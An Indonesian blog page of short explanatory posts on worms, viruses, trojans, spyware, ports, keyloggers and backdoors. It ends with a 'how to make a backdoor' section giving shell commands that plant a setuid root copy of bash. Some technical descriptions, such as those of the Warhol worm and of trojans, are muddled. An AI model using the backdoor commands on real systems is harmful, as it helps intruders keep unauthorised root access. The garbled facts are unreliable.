Kembali ke Reff: 3x

F G C G
KebesaranMu.... Tuhan aaaa..
F G C
Aaaa....aaaaa...aaaa

Baca selengkapnya ��

Worms


Cacing atau istilah asingnya worms. Cacing-cacing di Internet (Worms) adalah autonomous intrusion agents yang mampu melakukan penggandaan-diri dan menyebar dengan memanfaatkan kelemahan-kelemahan sekuriti (security flaws) pada services yang umum digunakan. Worm bukanlah sebuah fenomena baru, ditemukan pertama kali penyebarannya pada tahun 1988. Worms telah menjadi sebuah ancaman yang mematikan di Internet, walaupun sebagian besar kasus yang terjadi secara spesifik adalah pada sistim berbasis Windows. Beberapa jenis worms terbaru memanfaatkan electronic mail (e-mail) sebagai medium penyebarannya.

Metode aktivasi dan mekanisme penyebaran worms :

Perbedaan mendasar antara worm dan virus terletak pada bagaimana mereka membutuhkan intervensi user untuk melakukan penggandaandiri dan menyebar menginfeksi sistim komputer. Virus lebih lambat dalam melakukan penyebaran jika dibandingkan dengan worm....

Namun virus mempunyai kemampuan lebih untuk menghindari deteksi program anti-virus yang berusaha mengidentifikasi dan mengontrol penyebaran virus pada sistim komputer. Namun pada praktek penyebarannya sebuah virus dapat menjadi sebuah worm. Untuk memudahkan pembahasan, kita membatasi terminologi antara worm dan virus dengan mempertimbangkan metode aktivasi yang dilakukan oleh sebuah worm proses yang dilakukan sebuah worm untuk mengeksekusi pada sebuah sistim komputer dan mekanisme penyebaran proses yang memungkinkansebuah worm berkelana dari satu host ke host yang lain.

• Metode aktivasi
Pengertian bagaimana worm dapat aktif pada sebuah host berhubungan erat dengan kemampuan worm untuk menyebarkan diri, sejumlah worms dapat diatur untuk aktif secara langsung (activated nearly immediately), sementara yang lain dapat menunggu beberapa hari, minggu atau bahkan bulan untuk dapat teraktivasi dan kemudian menyebarkan-dirinya.

a. Aktivasi dengan intervensi user
Merupakan proses aktivasi paling lambat karena membutuhkan intervensi user untuk mengeksekusi worm tersebut, baik disadari maupun tidak oleh user tersebut. Namun karena sosialisasi yang gencar dilakukan mengenai bahaya worm dan virus, user dapat lebih cermat dengan tidak mengeksekusi program asing atau membuka attachment e-mail dari orang yang tidak dikenalnya, hal ini tentu akan memperlambat proses aktivasi worm. Tetapi pembuat worm tidak putus asa dengan kondisi tersebut sehingga mereka melakukan teknik social engineering seperti yang dilakukan oleh virus Melissa yang seolah-olah mengirimkan informasi penting dari orang yang telah dikenal oleh korban atau pesan-pesan personal lainnya yang dikirimkan oleh virus ILOVEYOU. Walaupun Melissa adalah sebuah virus macro pada program MicrosoftWord namun dengan intervensi user maka penyebaran Melissa di Internet sempat menjadi ancaman yang paling menakutkan.

b. Aktivasi terjadwal
Metode aktivasi worm yang lebih cepat adalah dengan menggunakan proses terjadwal pada sistim (scheduled system proces). Ada banyak program yang berjalan pada lingkungan desktop maupun server untuk melakukan proses sesuai dengan jadwal yang diberikan. Metode ini tetap membutuhkan intervesi manusia namun kali ini intervensi attacker yang dibutuhkan. Sebagai contoh, program auto-update dari sistim yang melakukan proses updating ke server vendor. Dengan melakukan update ke remote host sebagai master, seorang attacker yang cerdik dapat memanfaatkan proses tersebut untuk menyebarkan worm dengan terlebih dahulu menguasai remote host atau gateway pada network maupun di Internet dan mengganti atau menginfeksi file yang dibutuhkan pada proses update dengan kode program worm.

c. Aktivasi mandiri
Metode aktivasi mandiri adalah metode tercepat worm dalam menggandakandiri, menyebar, dan menginfeksi host korban. Metode ini paling populer digunakan oleh para penulis worm. Umumnya worm yang menggunakan metode ini memanfaatkan kelemahan sekuriti (security flaw) pada service yang umum digunakan. Sebagai contoh, worm CodeRed yang mengeksploitasi webserver IIS. Worm akan menyertakan dirinya pada service daemon yang sudah dikuasainya atau mengeksekusi perintah-perintah lain dengan privilege yang sama dengan yang digunakan oleh daemon tersebut. Proses eksekusi tersebut akan berlangsung ketika worm menemukan vulnerable service dan melakukan eksploitasi terhadap service tersebut.

• Mekanisme Penyebaran
Worm menginfeksi host korban dan memasukkan kode program sebagai bagian dari program worm ke dalamnya. Kode program tersebut dapat berupa machine code, atau routine untuk menjalankan program lain yang sudah ada pada host korban. Dalam proses penyebarannya, worm harus mencari korban baru dan menginfeksi korban dengan salinan dirinya. Proses pendistribusian tersebut dapat berlangsung sebagai proses distribusi satuan (dari satu host ke host yang lain) atau sebagai proses distribusi masal (dari satu host ke banyak host).

Proses distribusi masal dipertimbangkan sebagai metode penyebaran tercepat dengan asumsi batasan yang digunakan adalah satuan waktu. Terdapat beberapa mekanisme penyebaran yang digunakan worm untuk menemukan calon korban yaitu dengan melakukan scanning, mencari korban berdasarkan target list yang sudah dipersiapkan terlebih dahulu oleh penulis worm atau berdasarkan list yang ditemukan pada sistim korban maupun di metaserver, serta melakukan monitoring secara pasif.


a. Scanning
Metode scanning melibatkan proses probing terhadap sejumlah alamat di Internet dan kemudian mengidentifikasi host yang vulnerable. Dua format sederhana dari metode scanning adalah sequential (mencoba mengidentifikasi sebuah blok alamat dari awal sampai akhir) dan random (secara acak). Penyebaran worm dengan metode scanning baik sequential maupun random, secara komparatif dapat dikatakan lambat, namun jika dikombinasikan dengan aktivasi secara otomatis, worm dapat menyebar lebih cepat lagi. Worm yang menggunakan metode scanning biasanya mengeksploitasi security holes yang sudah teridentifikasi sebelumnya sehingga secara relatif hanya akan menginfeksi sejumlah host saja. Metode scanning lainnya yang dinilai cukup efektif adalah dengan menggunakan bandwidth-limited routine (seperti yang digunakan oleh CodeRed, yaitu dengan membatasi target dengan latensi koneksi dari sistim yang sudah terinfeksi dengan calon korban yang baru), mendefinisikan target yang hanya terdapat pada local address (seperti dalam sebuah LAN maupunWAN), dan permutasi pada proses pencarian. Scanning yang dilakukan worm tidaklah spesifik terhadap aplikasi sehingga attacker dapat menambahkan sebuah exploit baru pada sebuah worm yang sudah dikenal. Sebagai contoh, worm Slapper mendapatkan muatan exploit baru dan menjadikannya sebuah worm baru yaitu Scalper.

b. Target lists
Sebuah worm dapat memiliki target list yang sudah ditentukan sebelumnya oleh penulis worm tersebut. Dengan target list yang sudah ditentukan terlebih dahulu membuat sebuah worm lebih cepat dalam menyebar, namun tentu saja penyebaran tersebut akan sangat terbatas karena target berdasarkan sejumlah alamat di Internet yang sudah ditentukan. Selain itu, worm dapat menemukan list yang dibutuhkan pada host korban yang sudah dikuasainya, list ini umumnya digunakan oleh worm yang metode penyebarannya berdasarkan topologi network. Informasi yang didapat contohnya adalah IP address sistim tersebut dan worm mengembangkannya menjadi sebuah subnet pada LAN atauWAN.

c. Monitoring secara pasif
Worm pasif tidak mencari korbannya, namun worm tersebut akan menunggu calon korban potensial dan kemudian menginfeksinya. Walaupun metode ini lebih lambat namun worm pasif tidak menghasilkan anomalous traffic patterns sehingga keberadaan mereka akan sulit diketahui. Sebagai contoh, "antiworm" CRClean tidak membutuhkan aktivasi user, worm ini menunggu serangan worm CodeRed dan turunannya, kemudian melakukan respon dengan melakukan counter-attack. Jika proses counter-attack berhasil, CRClean akan menghapus CodeRed dan menginfeksi korban dengan menginstal dirinya pada mesin. Sehingga CRClean dapat menyebar tanpa melakukan proses scanning.

Superworms

1. Warhol Worm
Diskusi mengenai warhol worm dimulai ketika jenis ini mulai menyerang internet pada tahun 2001. Jenis yang terkenal adalah virus Code Red yang sangat cepat penyerangannya. Jenis ini otomatis melakukan scanning secara acak pada korbannya dan menggunakan hanya pada sifat yang mudah kena serang dalam Internet Information Services (IIS). Berdasarkan analisis bahwa bagian web server yang terkena serangan menyebar secara berlipat ganda dalam setiap waktu. Pada awalnya, setiap server yang terkena serangan dapat kita temukan 1,8 bagian lain yang terkena serangan dalam setiap jam, rata-rata 0.7 Code Red menggandakan dirinya pada tanggal 19 July 2001. Suatu karakteristik yang membedakan Code Red adalah melakukan scanning secara acak. Berdasarkan data bahwa Code Red melakukan scanning pada bagian komputer yang mudah kena serangan sampai 500.000 waktu per jam.
Code Red II menargetkan menyerang pada bagian yang sama dari IIS yang diserang Code Red. Sebuah strategi scanning yang dilakukannya, dimana Code Red II memilih secara acak alamat IP dari ruang alamat korban kelas B dengan kemungkinan 3/8, secara acak ruang alamat IP dari korban kelas A dengan kemungkinan ½, dan kemungkinan 1/8 dari ruang alamat IP secara keseluruhan. Berdasarkan strategi dari penyerangannya, kita dapat menyimpulkan bahwa Code Red II hampir dipastikan juga melakukan tujuan yang bersifat percobaan.
Jenis lain yang akan dijabarkan adalah Nimda worm. Nimda menggunakan lima cara yang berbeda dalam penyebarannya, yakni bagian IIS yang mudah kena serangan yaitu : email, bagian jaringan yang terbuka (dishare), halaman web yang terinfeksi menyebar kepada pengunjung yang melakukan browsing, dan bagian-bagian yang telah diserang oleh Code Red II dan virus.
Contoh lain adalah Warhol worm dan Flash worm, pada tulisan ini tidak dijelaskan secara mendetail. Konsep kerja dari warhol worm dengn cara ”hit-list scanning”, yaitu mengumpulkan bagian-bagian (listing) yang sebagai target dalam penyerangannya. Permutasi scanning adalah salah satu target perkembangbiakan yang lain untuk mengurangi overlap scanning diantara seluruh worm. Worm baru berkembang biak pada sebuah ruang alamat IP dengan cara permutasi dengan menggunakan sebuah block chiper 32-bit dan pre-selected key. Worm akan meng-encrypt sebuah IP untuk mengambil permutasi yang bersesuaian, kemudian melakukan decrypt untuk mengambil sebuah IP. Selama terinfeksi, worm akan meningkatkan permutasi mulai dari IP hash secara acak.

2. Curious Yellow
Bagian utama dari komunikasi dan koordinasi alamat adalah merancang sebuah Curious Yellow worm. Bagian ini akan menguraikan keuntungan-keuntungan dari koordinasi worm, kemudahan dalam mengontrol dan mekanisme yang up to date, serta mengungkapkan lebih sedikit dari lalu lintas worm. Berbagai kesulitan dalam koordinasi diantaranya adalah masalah skala koordinasi, penekanan harga koordinasi, kebutuhan untuk megambil kedalam laporan, dll.
Sebuah konsep hipotesis dari Curious Blue, worm menyapu bersih setelah infeksi sebuah Curous Yellow dengan menggunakan strategi penyebaran yang sama, atau dengan memanfaatkan bagian yang mudah kena serangan di dalam Curious Yellow sendiri dengan cara yang cepat. Untuk itu tingkat keamanan yang lebih baik dapat menghindari dari serangan-serangan worm tersebut.

Baca selengkapnya ��

Virus


Merupakan program buatan manusia yang dapat memperlambat kinerja sistem, merugikan serta merusak sistem. Program ini mempunyai kemampuan untuk mengembang atau menyebar yang telah diatur di dalam program tersebut.
Virus komputer dinamakan “Virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran (biological viruses). Virus komputer dapat diartikan sebagai suatu program komputer biasa.Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya, yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasi bahkan merusak (virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi yang berbeda dengan “Worm”)
untuk lebih lengkapnya mengenai pembahasan ini silahkan klik (baca selengkapnya)...

• Kriteria Virus
Suatu program yang disebut virus baru dapat dikatakan adalah virus apabila minimal memiliki 5 kriteria :

1. Kemampuan suatu virus untuk mendapatkan informasi
2. Kemampuannya untuk memeriksa suatu program
3. Kemampuannya untuk menggandakan diri dan menularkan
4. Kemampuannya melakukan manipulasi
5. Kemampuannya untuk menyembunyikan diri.

1.Kemampuan untuk mendapatkan informasi

Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory agar virus dapat mengenali program program apa saja yang akan di tulari, contoh virus makro yang akan menginfeksi semua file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, terus memilahnya dengan mencari file-file yang bisa ditulari. Biasanya data ini tercipta saat program yang tertular/terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan pengumpulan data dan menaruhnya di RAM, sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap program bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .

2.Kemampuan memeriksa suat program

Suatu virus juga harus bisa untuk memeriksa suatu program yang akan ditulari, misalnya : ia bertugas menulari program berekstensi *.doc, dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum, karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah memiliki/ memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut. Contoh penandaan adalah misalnya memberikan suatu byte yang unik disetiap file yang telah terinfeksi.
3.Kemampuan untuk menggandakan diri

Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu virus apabila telah menemukan file atau program maka ia akan mengenalinya dengan memeriksanya, jika belum terinfeksi maka sang virus akan menulari dengan cara menuliskan byte pengenal pada program/file tersebut, dan seterusnya mengcopykan/menulis kode objek virus di atas file/program yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk menulari/ menggandakan dirinya adalah:

a. File/Program yang akan ditulari dihapus atau diubah namanya. Kemudian diciptakan suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)
b. Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file/program yang ada.

4.Kemampuan mengadakan manipulasi

Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file/program. Isi dari suatu rutin ini dapat beragam mulai dari yang teringan sampai pengrusakan. Rutin ini umumnya digunakan untuk memanipulasi program ataupun mempopulerkan pembuatnya. Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System), sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. misal:

a. Membuat gambar atau pesan pada monitor
b. Mengganti/mengubah ubah label dari tiap file, direktori, atau label dari drive di pc
c. Memanipulasi program/file yang ditulari
d. Merusak program/file
e. Mengacaukan kerja printer

5.Kemampuan Menyembunyikan diri

Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana. Langkah-langkah yang biasa dilakukan adalah:

- Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai.
- Program virus diletakkan pada Boot Record atau track yang jarang diperhatikan oleh komputer itu sendiri
- Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah ukurannya
- Virus tidak mengubah keterangan waktu suatu file

• Siklus Hidup Virus
secara umum, melalui 4 tahap:
o Dormant phase ( Fase Istirahat/Tidur )
Pada fase ini virus tidak aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, contoh : tanggal yang ditentukan, kehadiran program lain/dieksekusinya program lain.

o Propagation phase ( Fase Penyebaran )
Pada fase ini virus akan mengcopykan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk atau ram). Setiap program yang terinfeksi akan menjadi hasil “klonning” virus tersebut (tergantung cara virus tersebut menginfeksinya)

o Trigerring phase ( Fase Aktif )
Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant phase

o Execution phase ( Fase Eksekusi )
Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan

Baca selengkapnya ��

Trojan


Merupakan sebuah program yang memungkinkan komputer kita dikontrol orang lain melalui jaringan atau internet dan merupakan replika atau duplikat dari virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah komputer. Sifat trojan adalah mengkontrol computer secara otomatis. Misalnya komputer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote access trojans) di mana sebuah komputer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka komputer agar dapat dimasuki oleh komputer dan diaccess dari jauh.

Dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Dapat disebut sebagai Trojan saja (membuang kata horse).
mari kita simak lebih dalam lagi...

Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut:
Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash. Trojan tidak mereplikasi dirinya sendiri, sementara virus komputer dan worm melakukannya.

Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalam Perang Troya, para prajurit Yunani bersembunyi di dalam Kuda Troya yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya tersebut menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak.

Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang hacker untuk mencuri data yang penting bagi pengguna (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi (seringnya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.
Sifat trojan adalah mengkontrol computer secara otomatis. Misalnya computer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote access trojans) dimana sebuah computer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka computer agar dapat dimasuki oleh computer dan diaccess dari jauh.



Beberapa jenis Trojan yang beredar antara lain adalah:

• Pencuri password
Jenis Trojan ini dapat mencari password yang disimpan di dalam sistem operasi (/etc/passwd atau /etc/shadow dalam keluarga sistem operasi UNIX atau berkas Security Account Manager (SAM) dalam keluarga sistem operasi Windows NT) dan akan mengirimkannya kepada si penyerang yang asli. Selain itu, jenis Trojan ini juga dapat menipu pengguna dengan membuat tampilan seolah-olah dirinya adalah layar login (/sbin/login dalam sistem operasi UNIX atau Winlogon.exe dalam sistem operasi Windows NT) serta menunggu pengguna untuk memasukkan passwordnya dan mengirimkannya kepada penyerang. Contoh dari jenis ini adalah Passfilt Trojan yang bertindak seolah-olah dirinya adalah berkas Passfilt.dll yang aslinya digunakan untuk menambah keamanan password dalam sistem operasi Windows NT, tapi disalahgunakan menjadi sebuah program pencuri password.

• Pencatat penekanan tombol (keystroke logger/keylogger)
Jenis Trojan ini akan memantau semua yang diketikkan oleh pengguna dan akan mengirimkannya kepada penyerang. Jenis ini berbeda dengan spyware, meski dua hal tersebut melakukan hal yang serupa (memata-matai pengguna).

• Tool administrasi jarak jauh (Remote Administration Tools/RAT)
Jenis Trojan ini mengizinkan para penyerang untuk mengambil alih kontrol secara penuh terhadap sistem dan melakukan apapun yang mereka mau dari jarak jauh, seperti memformat hard disk, mencuri atau menghapus data dan lain-lain. Contoh dari Trojan ini adalah Back Orifice, Back Orifice 2000, dan SubSeven.

• DDoS Trojan atau Zombie Trojan
Jenis Trojan ini digunakan untuk menjadikan sistem yang terinfeksi agar dapat melakukan serangan penolakan layanan secara terdistribusi terhadap host target.

Ada lagi sebuah jenis Trojan yang mengimbuhkan dirinya sendiri ke sebuah program untuk memodifikasi cara kerja program yang diimbuhinya. Jenis Trojan ini disebut sebagai Trojan virus.

Mendeteksi keberadaan Trojan merupakan sebuah tindakan yang agak sulit dilakukan. Cara termudah adalah dengan melihat port-port mana yang terbuka dan sedang berada dalam keadaan "listening", dengan menggunakan utilitas tertentu semacam Netstat. Hal ini dikarenakan banyak Trojan berjalan sebagai sebuah layanan sistem, dan bekerja di latar belakang (background), sehingga Trojan-Trojan tersebut dapat menerima perintah dari penyerang dari jarak jauh. Ketika sebuah transmisi UDP atau TCP dilakukan, tapi transmisi tersebut dari port (yang berada dalam keadaan "listening") atau alamat yang tidak dikenali, maka hal tersebut bisa dijadikan pedoman bahwa sistem yang bersangkutan telah terinfeksi oleh Trojan Horse.

Cara lainnya yang dapat digunakan adalah dengan membuat sebuah "snapshot" terhadap semua berkas program (*.EXE, *.DLL, *.COM, *.VXD, dan lain-lain) dan membandingkannya seiring dengan waktu dengan versi-versi terdahulunya, dalam kondisi komputer tidak terkoneksi ke jaringan. Hal ini dapat dilakukan dengan membuat sebuah checksum terhadap semua berkas program (dengan CRC atau MD5 atau mekanisme lainnya). Karena seringnya Trojan dimasukkan ke dalam direktori di mana sistem operasi berada (\WINDOWS atau \WINNT untuk Windows atau /bin, /usr/bin, /sbin, /usr/sbin dalam keluarga UNIX), maka yang patut dicurigai adalah berkas-berkas yang berada di dalam direktori tersebut. Banyak berkas yang dapat dicurigai, khususnya berkas-berkas program yang memiliki nama yang mirip dengan berkas yang "baik-baik" (seperti "svch0st.exe", dari yang seharusnya "svchost.exe", sebuah berkas yang dijalankan oleh banyak layanan sistem operasi Windows) dapat dicurigai sebagai Trojan Horse.

Baca selengkapnya ��

Trap


Merupakan interupsi karena terjadinya kesalahan atau kondisi kekecualian (exception conditions) yang dihasilkan proses yang running pada Diagram State Proses, seperti usaha illegal dalam mengakses file. Dengan adanya trap, sistem operasi menentukan apakah kesalahan yang dibuat merupakan kesalahan fatal.

- Jika fatal, proses yang saat itu running disingkirkan dan terjadi alih proses.
- Jika kesalahan tidak fatal, maka bergantung sifat kesalahan dan rancangan sistem operasi.

Kemungkinan yang dilakukan adalah menjalankan prosedur pemulihan atau memperingatkan ke pemakai. Saat terjadi trap, dapat dimungkinan terjadi pengalihan proses, mungkin pula resume proses.

Baca selengkapnya ��

Spyware

Merupakan perangkat lunak yang mengumpulkan dan mengirim informasi tentang pengguna komputer tanpa diketahui oleh si pengguna itu. Informasinya bisa yang tidak terlampau berbahaya seperti pola berkomputer, terutama berinternet, seseorang sampai yang berbahaya seperti nomor kartu kredit, PIN untuk perbankan elektronik (e-banking) dan password suatu account. Informasi tentang pola berinternet, telah disebutkan, tidak terlampau berbahaya. Situs yang dikunjungi, informasi yang kerap dicari, obrolan di ruang chat akan dimata-matai oleh si spyware. Selanjutnya, informasi itu digunakan untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah istilah untuk spyware yang begini.

Penyebaran spyware mirip dengan Trojan. Contohnya, flashget. Ketika flashget yang dipakai belum diregister, flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet, jalankan flashget yang belum diregister, cuekin computer beberapa saat, pasti muncul jendela internet explorer yang menampilkan iklan suatu situs.

Baca selengkapnya ��

Port-port komputer

1. Port 80, Web Server
Digunakan untuk web server, ketika user mengetikan alamat IP atau hostname di web broeser maka web browser akan melihat IP tersebut pada port 80,

2. Port 81, Web Server Alternatif
ketika port 80 diblok maka port 81 akan digunakan sebagai port altenatif hosting website

3. Port 21, FTP Server
Ketika seseorang mengakses FTP server, maka ftp client secara default akan melakukan koneksi melalui port 21 dengan ftp server

4. Port 22, SSH Secure Shell
Port ini digunakan untuk port SSH

5. Port 23, Telnet
Jika menjalankan server telnet maka port ini digunakan client telnet untuk hubungan dengan server telnet

6. Port 25, SMTP (Simple Mail Transport Protokol)
Ketika mengirim email ke server SMTP, maka port yg digunakan adalah port 25

7. Port 2525 SMTP Alternate Server
Port alternatifi aktif dari TZO untuk menservice forwarding email. Bukan standard port, tapi dapat digunakan apabila port SMTP terkena blok.

8. Port 110, POP Server
Jika menggunakan Mail server, user jika log ke dalam mesin tersebut via POP3 (Post Office Protokol) atau IMAP4 (Internet Message Access Protocol) untuk menerima emailnya, POP3 merupakan protokol untuk mengakses mail box

9. Port 119, News (NNTP) Server

10. Port 389, LDAP Server

11. Port 143, IMAP4 (Internet Message Access Protocol ) Server

12. Port 443, Secure Sockets Layer (SSL) Server
Untuk membuka Secure Transaction server.

13. Port 5900, Virtual Network Computing (VNC)

Baca selengkapnya ��

Keylogger

Keystroke logger atau disingkat keylogger, sering dihubungkan dengan kegunaannya sebagai tool terlarang atau jahat yang diinstalasi secara diam-diam untuk mengambil semua tombol yang ditekan. Sama seperti tool hacker lainnya, keystroke logging dimaksudkan sebagai tool administrasi dan diagnosis.

Keylogger adalah produk hardware atau utility software yang mencatat semua penekanan tombol pada komputer. Bisa saja hanya mencatat penekakan tombol dan datanya diambil secara manual, atau didesain supaya otomatis mengirimkan hasilnya ke suatu alamat e-mail. Keylogger hardware biasanya suatu perangkat yang dipasang di antara computer dan keyboard. Pengguna yang teliti atau waspada bisa memeriksa dan menemukan keylogger semacam ini. Namun, beberapa keylogger hardware lebih tersembunyi dan bisa saja dimasukkan ke dalam keyboard itu sendiri supaya tidak diketahui. Keylogger software biasanya terdiri dari dua file yang diinstalasi pada direktori yang sama: DLL yang melakukan semua pekerjaan dan EXE yang memuat DLL tersebut. Yang sederhana sering kali dijalankan pada waktu booting melalui registry. Yang lebih canggih tidak terlihat dalam daftar proses dan bisa beroperasi pada tingkat kernel serta entri registry-nya tidak terlihat. Terlepas dari bentuk mereka, keylogger dimaksudkan untuk mengawasi apa yang Anda ketik pada komputer sehingga dapat dilihat oleh pihak lain.
Manfaat buruk keylogger adalah digunakan untuk mencuri password dan username atau bahkan bisa juga untuk mencuri nomor credit card. Beberapa keylogger juga dilengkapi untuk mengirim hasil tangkapanya ke email tertentu. Akan tetapi keylogger bisa juga digunakan sebagai sarana back up data. Maksudnya anda bisa saja ketika mengetikkan sesuatu tiba-tiba software ketikan anda rusak atau not responding dan anda kehilangan hasil ketikan anda.

Keylogger adalah program spy yang akan mencatat segala aktivitas yang kita lakukan di suatu komputer dan menyimpan semua informasi kedalam log file. Bekerja dengan mendeteksi signal keyboard yang kita tekan. Awal mulanya program ini ditujukan bagi orang tua agar bisa mengontrol aktifitas anak-anak mereka di komputer. Akan tetapi oleh sebagian orang yang tidak bertanggung jawab, program ini digunakan untuk memata-matai dan mencuri informasi-informasi yang mungkin penting untuk mereka (password email, nick, channel irc).

Agar mengetahui di suatu komputer terdapat key logger (di OS under windows, pada sebagian besar warnet menggunakan ms windows untuk client) yaitu dengan membuka file-file registrasi. Sebagai contoh msconfig.exe (start --> run --> msconfig) maka akan muncul menu "system Configuration Utility" click menu "startup" secara default akan muncul 5-6 item yaitu :

1. scanregistry
2. TaskMonitor
3. System tray
4. load power profile
5. schedulingAgen
Atau dengan menggunakan cara lain untuk mencegah hal-hal yang tidak diinginkan akibat keylogger, biasanya situs-situs yang memerlukan privasi tinggi telah menggunakan fitur on-screen keyboard, yaitu aplikasi keyboard yang muncul di layar komputer. Namun jika situs yang di akses tidak menyediakan fasilitas tersebut, maka juga bisa menjalankan aplikasi on-screen keyboard dari komputer itu sendiri, dengan cara meng-klik menu start – run – lalu ketik ”osk.exe” (tanpa tanda kutip). sehingga pada saat login atau memasukkan data-data penting, dengan menggunakan mouse maka data pribadi tidak akan dapat terekam.

Cara awam mengamankan diri dari keylogger :

1. Masukkan huruf pertama dari password anda di kolom password. Misalnya passwordnya adalah “cinta”, ketikkan “c” pada kolom password
2. Buka notepad atau apa saja untuk mengetik. Ketikkan karakter acak secara sembarang di software tersebut, misalnya “lkid2@asldiuna.shf”
3. Masukkan huruf kedua dari password yaitu “i” di kolom password
4. Pindahkan kursor ke notepad kemudian ketikkan karakter acak secara sembarang di notepad (jangan hapus ketikan acak sebelumnya) misalnya “j;;kmqw89d7we”
5. Masukkan huruf ketiga password yaitu “n”
6. Pindah ke notepad kemudian ketikkan karakter acak sembarang misalnya “e78d3e2enh,.asyudas”
7. Lanjutkan sampai password terisi dengan benar.

Bila komputer terpasang keylogger, setiap ketikan akan direkam termasuk password. Saat mengetikkan password, huruf pertama anda masukkan “c” kemudian karakter acak sembarang maka semua karakter ketikan akan terekam dengan baik oleh keylogger. Si “maling” akan mendapatkan karakter panjang tak bermakna yang cukup membingungkan untuk menentukan apa password korbannya.

Maka string yang didapatkan si “maling” :
clkid2@asldiuna.shfij;;kmqw89d7wene78d3e2enh,.asyudast‘9weuryqwrbsd8u8′pejs,cjhsa

Anda bisa mempraktekkan cara di atas untuk setiap komputer yang dicurigai berkeylogger atau ingin lebih aman mengakses internet di komputer umum. Cara ini bisa dipakai bukan hanya untuk browser tapi juga e-mail client atau aplikasi lainnya. Bisa digabungkan dengan username sehingga mempersulit si maling untuk mendapatkan combo username & password.

Akan tetapi, walupun cara ini bisa “membodohi” kebanyakan hardware/software keylogger tetapi tidak bisa menghindari software keylogger yang berkemampuan capture screen.

Baca selengkapnya ��

Backdoor

Merupakan jalan belakang untuk menghindari password untuk login. Jalan belakang ini dimungkinkan karena aplikasi atau rootkit yang jalan dikomputer tersebut. Sehingga Backdoor merupakan suatu istilah yang seringkali digunakan untuk masuk ke dalam sistem tanpa sepengetahuan administrator, namun hal tersebut bisa dilakukan jika penyusup pernah masuk kedalam sistem tersebut dengan hak akses root. Pemberian backdoor dilakukan untuk mempermudah mereka memasuki sistem tersebut jika jalan yang telah dibuat dengan eksploit telah ditutup oleh administrator. Sehingga tujuan dari backdoor bukan untuk mendapatkan previlege root, tetapi untuk mendapatkan kembali previlege yang pernah diperoleh. Contoh sederhana dari backdoor adalah mengganti user id dengan user id root yaitu 0.

• Cara Membuat backdoor :
Tujuan utama dari backdoor adalah agar kita mempunyai jalan belakang menuju sasaran yang tentu saja tidak atau susah diketahui oleh sang pemilik. Berikut langkah-langkah membuat Backdoor adalah :

Local Backdoor
cd /bin
cp bash load
chgrp root load
chmod +s load
